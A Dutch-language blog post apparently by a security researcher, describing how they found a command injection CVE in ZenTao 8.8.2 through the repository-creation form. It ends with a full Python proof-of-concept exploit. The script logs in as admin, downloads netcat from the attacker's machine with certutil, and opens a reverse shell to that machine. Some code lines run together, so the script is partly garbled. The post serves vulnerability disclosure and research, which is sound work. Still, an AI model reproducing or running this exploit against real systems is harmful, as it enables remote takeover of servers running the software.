ZenTao 8.8.2 RCE

ZenTao 8.8.2 RCE

In deze artikel wil ik de stappen gaan beschrijven die ik heb ondernomen om mijn eerste CVE te kunnen vinden. Ik heb de kwetsbaarheid gevonden met behulp van een blackbox benadering, dit houd in dat ik met behulp van BurpSuite rond heb gekeken op zoek naar kwetsbare functies of parameters.

Op een gegeven moment zag ik een pagina dat uiteindelijk mij doorstuurden naar een pagina waar ik een Github url kon invoeren en een bepaalde commando.

Nadat ik dus in het menu hierop had geklikt kwam ik op de pagina terecht.

Zoals te zien is in de afbeelding kan ik een path en een client path opgeven, deze twee velden waren van belang om de bug te kunen misbruiken. De path moest verwijzen naar een windows programma dat commando’s kon uitvoeren, waarna de client path een commando ingevoerd kon worden. De commando moest wel afgesloten worden met (&&) anders deed de commando het niet. Deze twee symbolen achter elkaar betekend dat je meerdere commando’s kan uitvoeren op een enkele regel.

In bovenstaande afbeelding ga ik nu een bestand downloaden van mijn ubuntu machine naar de windows machine, in dit geval een bestand genaamd bad.exe dat eigenlijk een netcat programma is.

Zoals te zien is in bovenstaande afbeelding kregen wij inderdaad een connectie terug en dit betekende dat het inderdaad werkte zoals verwacht. Nu dus een nieuwe commando sturen die verbinding gaat maken met mij luisteraar.

Na op de submit knop te hebben gedrukt zien wij het volgende

WHOOP WHOOP we hebben een shell. Geweldig! Hierna had ik mijn CVE gesubmit en zo heb ik mijn eerste CVE gevonden. Hieronder de proof of concept video + script.

# Exploit Title: ZenTao Pro 8.8.2 - Command Injection
# Date: 2020-07-01
# Exploit Author: Daniel Monzón & Melvin Boers
# Vendor Homepage: https://www.zentao.pm/
# Version: 8.8.2
# Tested on: Windows 10 / WampServer
# Other versions like pro or enterprise edition could be affected aswell
# Netcat is needed to use this exploit


import requests
import hashlib
import urllib.parse


host = 'http://192.168.223.132'
username = 'admin'
password = 'Test123!@#'
name = 'Test2'
command = 'certutil.exe+-urlcache+-f+-split+http%3A%2F%2F192.168.223.131%2Fnc.exe+C%3A%5Cbad.exe+%26%26'
command2 = 'C:\\bad.exe 192.168.223.131 9001 -e cmd.exe &&'
git_path = 'C%3A%5CProgramData'x = requests.session() # Create a session, as needed because we need admin rights.def sign_in(url, username, password):
  password = hashlib.md5(password.encode('utf-8')).hexdigest() # We need to md5 encode the password in order to sign in
  proxy = {'http':'127.0.0.1:8080', 'https':'127.0.0.1:8080'} # Just for debugging phase
  credentials = {'account' : username, 'password' : password} # The credentials we need
  path = url + '/zentao/user-login.html' # URL + path
  x.post(path, data=credentials, proxies=proxy, verify=False) # Send the post request to sign in
  return '[*] We are signed in!'


def go_to_repo(url):
	path = url + '/zentao/repo-browse.html'
	x.get(path, verify=False)

	print('[*] Getting to repo path')def create_repo(url, name, command):
	headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
	      'Accept-Encoding':'gzip, deflate',
	      'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
	      'X-Requested-With': 'XMLHttpRequest', 
	      'Origin':'http://192.168.223.132',
	      'Referer':'http://192.168.223.132/pro/repo-create.html', 
	      'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',
	      'Accept-Language':'en-US,en;q=0.5'}

	cookies = {'ajax_lastNext':'on',
	      'windowWidth':'1846',
	      'windowHeight':'790'}

	path = url + '/zentao/repo-create.html'
	parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command
	x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False)

	print('[*] Creating the repo')


def get_shell(url, name, command):
	headers = {'Accept':'application/json, text/javascript, */*; q=0.01',
	      'Accept-Encoding':'gzip, deflate',
	      'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
	      'X-Requested-With': 'XMLHttpRequest', 
	      'Origin':'http://192.168.223.132',
	      'Referer':'http://192.168.223.132/pro/repo-create.html', 
	      'User-Agent':'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0',
	      'Accept-Language':'en-US,en;q=0.5'}

	cookies = {'ajax_lastNext':'on',
	      'windowWidth':'1846',
	      'windowHeight':'790'}

	path = url + '/zentao/repo-create.html'
	parameters = 'SCM=Git&name=' + name + '&path=' + git_path + '&encoding=utf-8&client=' + command2
	x.post(path, data=parameters, headers=headers, cookies=cookies, verify=False)

	print('[*] Check your netcat listener!')


def main():
	switch = True

	if switch:
      sign_in(host, username, password)
      if switch:
        go_to_repo(host)
        if switch:
          create_repo(host, name, command)
          if switch:
          	get_shell(host, name, command2)
          	switch = False


if __name__ == "__main__":
	main()
Please share and spread
NederlandsEnglish